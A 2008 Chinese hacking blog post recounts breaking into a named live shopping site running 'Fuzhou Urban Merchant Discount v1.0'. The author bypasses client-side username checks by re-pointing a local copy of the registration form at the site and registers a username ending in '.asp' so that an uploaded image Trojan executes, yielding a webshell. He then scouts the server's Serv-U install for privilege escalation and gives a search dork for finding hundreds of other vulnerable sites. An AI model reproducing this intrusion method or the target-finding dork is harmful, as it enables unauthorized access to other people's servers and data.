1. 公告

    • 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)

  2. 写作时间

    << 2008-12 >>

    Sun

    Mon

    Tue

    Wed

    Thu

    Fri

    Sat

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

  3. 原创下载

  4. 最新文章

  5. 最新评论

  6. 文章归档

  7. Statistics

    • 文章总数:194
    • 评论总数:67
    • 引用总数:0
    • 浏览总数:240437
    • 留言总数:0
    • 当前样式:4u-HK
    • 当前语言:zh-CN

  8. 友情链接

  9. 反向链接

福州都市商家折扣 v1.0 小漏洞

今日看到一个网站,觉得不错..但不知道是什么源码.于是就产生了一种入侵的想法.
http://www.shopwuhu.com/
先是注册一个用户. 试用会员.

到管理中心查看了一下....
发现有上传的地方..
但不能上传ASP等文件.....正常
再细看了一下..有重大发现....
发现上传图片的文件路径为XXXX/用户名/2007xxx.jpg

于是一想..可不可以将用户名改为 xx.asp 呢? 至于原理大家都明白了吧!!!
于是再看注册页面
用户名:
2-16个英文、数字或下划线
(通常这些都是在本地验证..)
查看源码..发现
----------------------------
<script language="JavaScript">
<!--
function checkdata() {
if( isNumberString(addform.user.value,"1234567
890abcdefghijklmnopqrstuvwxyzABCDEFG
HIJKLMNOPQRSTUVWXYZ_")!=1 || addform.user.
value.length<2 || addform.user.value.length>16) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·
用户名必须是2-16位的数字、英文或下划线")
return false;
}
if( addform.pass.value =="" || addform.pass.value.length<4
 || addform.pass.value.length>16) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·请输入 4-16 位的密码")
return false;
}
if( addform.pass1.value =="" || addform.pass1.value.length<4
 || addform.pass1.value.length>16) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·请输入您的确认密码")
return false;
}
if( addform.pass.value != addform.pass1.value ) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·密码与确认密码不一致,请重新输入")
return false;
}
if( addform.colxr.value =="" ) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·请输入您的企业联系人")
return false;
}
if( addform.addone_id.value =="" || addform.addtwo_id.value=="") {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·请选择企业所在地区")
return false;
}
if( addform.coaddress.value =="" ) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·请输入您的企业详细地址")
return false;
}
if( isNumberString(addform.cotelq.value,"1234567890")!=1 || i
sNumberString(addform.cotel.value,"1234567890")!=1 || addfor
m.cotelq.value =="" || addform.cotel.value=="" || addf
orm.cotelq.value.length<3 || addform.cotelq.value.length>4 || addf
orm.cotel.value.length<7 || addform.cotel.value.length>8) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·请输入正确的企业联系电话及区号")
return false;
}
if( isNumberString(addform.mail.value,"123456
7890abcdefghijklmnopqrstuvwxyzABCDEFGHIJ
KLMNOPQRSTUVWXYZ_@.-")!=1 || addform.mail.value.length<8) {
alert("\用户注册出错,下面是产生错误的可能原因:\n\n·请输入正确的联系邮箱")
return false;
}
return true;
}
function isNumberString (InString,RefString)
{
if(InString.length==0) return (false);
for (Count=0; Count < InString.length; Count++)  {
        TempChar= InString.substring (Count, Count+1);
        if (RefString.indexOf (TempChar, 0)==-1)  
        return (false);
}
return (true);
}
// -->
</script>
------------------------------------------------------------------------------------------------------------------
哈哈...把验证给删了不就行了吗?
于是说做就做...
并加上了form的详细地址..
<form name="addform" method="post" action="reg_save.asp" onSubmit="return checkdata()">
<form  name="Login" method="post" action="user/Chkadmin.asp">

<form name="addform" method="post" action="
http://www.shopwuhu.com/reg_save.asp" onSubmit="return checkdata()">
<form  name="Login" method="post" action=
"http://www.shopwuhu.com/user/Chkadmin.asp">
...
成功了.....
哈哈.....
到上传页面上传ASP图片木马
一个webshell拿到...
进入后台.才知道这是
福州都市商家折扣 v1.0 
于是在google 一搜....
发现有很多网站是用这个源码....
太多了.....
----------------------------
再检查刚才那个网站的服务器....

可以看到....Serv-U
把快捷方式下落来...
发现路径为:D:\Program Files\Serv-U\
转跳成功
提权有望了..

 

版本为:
6.2.0.1 (March 6, 2006)
=======================
+ Changed the UPnP interface to be more forgiving of different brand routers and to search for other resources that might help to perform port mapping.
+ Changed the UPnP behavior when disabled, the UPnP discovery no longer occurs, no UPnP requests are made when disabled.
- Corrected a bug, introduced in 6.2.0.0, where virtual directories would not work when using long physical path names.
- Corrected a bug, introduced in 6.2.0.0, folder names ending with a tilde character (~) were treated as the user's home directory to the left of the tilde (~)
- Corrected a bug, introduced in 6.2.0.0, folder names either "COM" or "LPT" (without the port or printer number) were treated as DOS devices.
--------------------------
居然还有保存修改的权限...晕...
看来一台服务器就这样到手了..
现细看
ServUDaemon.BAK  
ServUDaemon.exe 
-------------------
ServUAdmin.BAK 
ServUAdmin.exe 
---------------------
看来管理员也不是SB
居然对这两个文件做过手脚..
虽然不能直接用工具提权....但下落来查看一下他改了什么就可以了...
还可以直接在
ServUDaemon.ini 添加用户......
-----------------------
我在这里就不提权了.....只是玩玩,,拿服务器也没意思....

大家不要破坏哦.......
哈哈....


http://www.sogou.com/     搜
shop_Notice_view.asp?id=
有几百个站....

您或许还对以下的内容感兴趣:

漏洞  
如果您拥有一个BLOG,如果您的BLOG的PV/IP/PR还算不错,如果您打算用您所拥有的BLOG来赚钱,那么我来告诉您几个赚钱的方法:

1、透过 Google AdSense 使您的BLOG产生收益

2、您还可以通过申请TextLinkAds投放者来直接出售链接位从而产生收入。